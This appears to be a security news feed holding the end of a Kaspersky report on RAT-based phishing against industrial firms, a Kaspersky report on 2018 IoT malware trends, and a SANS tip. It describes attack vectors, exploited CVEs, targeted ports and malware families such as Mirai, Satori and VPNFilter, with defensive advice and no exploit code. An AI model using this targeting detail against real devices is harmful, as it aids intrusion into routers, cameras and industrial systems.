    In the first half of 2018, Kaspersky Lab ICS CERT identified a new wave of phishing emails disguised as legitimate commercial offers. Although the attacks targeted primarily industrial companies within the territory of Russia, the same tactics and tools can be used in attacks on industrial companies in any country of the world.

    The malware used in these attacks installs legitimate remote administration software on the system — TeamViewer or Remote Manipulator System/Remote Utilities (RMS). In both cases, a system DLL is replaced with a malicious library to inject malicious code into a legitimate program’s process. This provides the attackers with remote control of the infected systems. Various techniques are used to mask the infection and the activity of the software installed on the system.

    If necessary, the attackers download an additional malware pack to the system, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools that extend the threat actor’s control of infected systems, malware to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.

    According to available data, the attackers’ main goal is to steal money from victim organizations’ accounts, but possible attack scenarios are not limited to the theft of funds. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines. Clearly, on top of the financial losses, these attacks result in leaks of victim organizations’ sensitive data.

    Multiple attacks on an auto manufacturer

    A characteristic example of attacks based on the second scenario was provided by attacks on the industrial network of a motor vehicle manufacturing and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles. Multiple attempts to conduct such attacks were blocked by Kaspersky Lab products.

    A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Starting in late 2017, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. Infection attempts were made regularly over a period of several months – 2-3 times a week, at different times of the day. Based in part on other indirect indicators, we believe that RAT authentication data was compromised and used by attackers (or malware) to attack the enterprise’s computers over the internet.

    After gaining access to the potential victim’s infrastructure via the RAT, the attackers kept trying to choose a malicious packer that would enable them to evade antivirus protection.

    The blocked programs included modifications of the malware detected by Kaspersky Lab products as Net-Worm.Win32.Agent.pm. When launched this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

    The Nymaim Trojan family was also blocked. Representatives of this family are often used to download modifications of botnet agents from the Necus family, which in turn have often been used to infect computers with ransomware from the Locky family.

    Conclusion

    Remote administration tools are widely used on industrial networks for ICS monitoring, control and maintenance. The ability to manipulate the ICS remotely significantly reduces maintenance costs, but at the same time, uncontrolled remote access, the inability to provide 100% verification of the remote client’s legitimacy, and the vulnerabilities in RAT code and configuration significantly increase the attack surface. At the same time, RATs, along with other legitimate tools, are increasingly used by attackers to mask malicious activity and make attribution more difficult.

    To reduce the risk of cyberattacks involving RATs, we recommend the following high-priority measures:

    • Audit the use of application and system remote administration tools on the industrial network, such as VNC, RDP, TeamViewer, and RMS / Remote Utilities. Remove all remote administration tools that are not required by the industrial process.
    • Conduct an audit and disable remote administration tools which came with ICS software (refer to the relevant software documentation for detailed instructions), provided that they are not required by the industrial process.
    • Closely monitor and log events for each remote control session required by the industrial process; remote access should be disabled by default and enabled only upon request and only for limited periods of time.

    New trends in the world of IoT threats

    Malware Alerts - Tue, 09/18/2018 - 06:00

    Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.

    We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018. (download)

    One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypots than all other types combined.

    service % of attacks Telnet 75.40% SSH 11.59% other 13.01%

    When it came to downloading malware onto IoT devices, cybercriminals’ preferred option was one of the Mirai family (20.9%).

    # downloaded malware % of attacks 1 Backdoor.Linux.Mirai.c 15.97% 2 Trojan-Downloader.Linux.Hajime.a 5.89% 3 Trojan-Downloader.Linux.NyaDrop.b 3.34% 4 Backdoor.Linux.Mirai.b 2.72% 5 Backdoor.Linux.Mirai.ba 1.94% 6 Trojan-Downloader.Shell.Agent.p 0.38% 7 Trojan-Downloader.Shell.Agent.as 0.27% 8 Backdoor.Linux.Mirai.n 0.27% 9 Backdoor.Linux.Gafgyt.ba 0.24% 10 Backdoor.Linux.Gafgyt.af 0.20%

    Top 10 malware downloaded onto infected IoT device following a successful Telnet password crack

    And here are the Top 10 countries from which our traps were hit by Telnet password attacks:

    !function(e,t,n,s){var i="InfogramEmbeds",o=e.getElementsByTagName(t)[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(s)&&(s=d+s),window[i]&&window[i].initialized)window[i].process&&window[i].process();else if(!e.getElementById(n)){var a=e.createElement(t);a.async=1,a.id=n,a.src=s,o.parentNode.insertBefore(a,o)}}(document,"script","infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

    Geographical distribution of the number of infected devices, Q2 2018. (download)

    As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.

    Since some smart device owners change the default Telnet password to one that is more complex, and many gadgets don’t support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.

    An example of the use of “alternative technology” is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:

    Advantages of this distribution method over password cracking:

    • Infection occurs much faster
    • It is much harder to patch a software vulnerability than change a password or disable/block the service

    Although this method is more difficult to implement, it found favor with many virus writers, and it wasn’t long before new Trojans exploiting known vulnerabilities in smart device software started appearing.

    New attacks, old malware

    To see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. This is the picture that emerged for Q2 2018:

    Service Port % of attacks Attack vector Malware families Telnet 23, 2323 82.26% Bruteforce Mirai, Gafgyt SSH 22 11.51% Bruteforce Mirai, Gafgyt Samba 445 2.78% EternalBlue, EternalRed, CVE-2018-7445 – tr-069 7547 0.77% RCE in TR-069 implementation Mirai, Hajime HTTP 80 0.76% Attempts to exploit vulnerabilities in a web server or crack an admin console password – winbox (RouterOS) 8291 0.71% Used for RouterOS (MikroTik) authentication and WinBox-based attacks Hajime Mikrotik http 8080 0.23% RCE in MikroTik RouterOS < 6.38.5 Chimay-Red Hajime MSSQL 1433 0.21% Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft – GoAhead httpd 81 0.16% RCE in GoAhead IP cameras Persirai, Gafgyt Mikrotik http 8081 0.15% Chimay-Red Hajime Etherium JSON-RPC 8545 0.15% Authorization bypass (CVE-2017-12113)RDP 3389 0.12% Bruteforce – XionMai uc-httpd 8000 0.09% Buffer overflow (CVE-2018-10088) in XionMai uc-httpd 1.0.0 (some Chinese-made devices) Satori MySQL 3306 0.08% Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft –

    The vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven’t seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware WannaCry and the Monero cryptocurrency miner EternalMiner.

    Here’s the breakdown of infected IoT devices that attacked our honeypots in Q2 2018:

    Device % of infected devices MikroTik 37.23% TP-Link 9.07% SonicWall 3.74% AV tech 3.17% Vigor 3.15% Ubiquiti 2.80% D-Link 2.49% Cisco 1.40% AirTies 1.25% Cyberoam 1.13% HikVision 1.11% ZTE 0.88% Miele 0.68% Unknown DVR 31.91%

    As can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. What’s interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) CVE-2017-7240 vulnerability in PST10 WebServer, which is used in their firmware.

    Port 7547

    Attacks against remote device management (TR-069 specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. And that’s despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.

    Another type of attack exploits the Chimay-Red vulnerability in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.

    IP cameras

    IP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.

    On June 8, 2018, a proof-of-concept was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking GPON routers.

    New malware and threats to end users DDoS attacks

    As before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.

    This is perhaps the least harmful scenario for the end user. The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often by “cured” with a simple reboot.

    Cryptocurrency mining

    Another type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.

    A more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:

    • At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular:
      • CVE-2014-8361 – RCE in the miniigd SOAP service in Realtek SDK
      • CVE 2017-17215 – RCE in the firmware of Huawei HG532 routers
      • CVE-2018-10561, CVE-2018-10562 – authorization bypass and execution of arbitrary commands on Dasan GPON routers
      • CVE-2018-10088 – buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers
    • Using compromised routers and the CVE-2018-1000049 vulnerability in the Claymore Etherium miner remote management tool, they substitute the wallet address for their own.
    Data theft

    The VPNFilter Trojan, detected in May 2018, pursues other goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals’ server. Here are the main features of VPNFilter:

    • Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject javascript code into intercepted web pages.
    • Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.
    • Uses TOR for communication with C&C.
    • Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.

    The Trojan’s distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.

    The very first VPNFilter report spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:

    • ASUS
    • D-Link
    • Huawei
    • Linksys
    • MikroTik
    • Netgear
    • QNAP
    • TP-Link
    • Ubiquiti
    • Upvel
    • ZTE

    The situation is made worse by the fact that these manufacturers’ devices are used not only in corporate networks, but often as home routers.

    Conclusion

    Smart devices are on the rise, with some forecasts suggesting that by 2020 their number will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).

    Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.

    Here are some simple tips to help minimize the risk of smart device infection:

    • Don’t give access to the device from an external network unless absolutely necessary
    • Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)
    • Regularly check for new firmware versions and update the device
    • Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters
    • Change the factory passwords at initial setup (even if the device does not prompt you to do so)
    • Close/block unused ports, if there is such an option. For example, if you don’t connect to the router via Telnet (port TCP:23), it’s a good idea to disable it so as to close off a potential loophole to intruders.

    Trust Your Instincts

    SANS Tip of the Day - Tue, 09/18/2018 - 01:00
    Ultimately, common sense is your best protection. If an email, phone call or online message seems odd, suspicious or too good to be true, it may be an attack.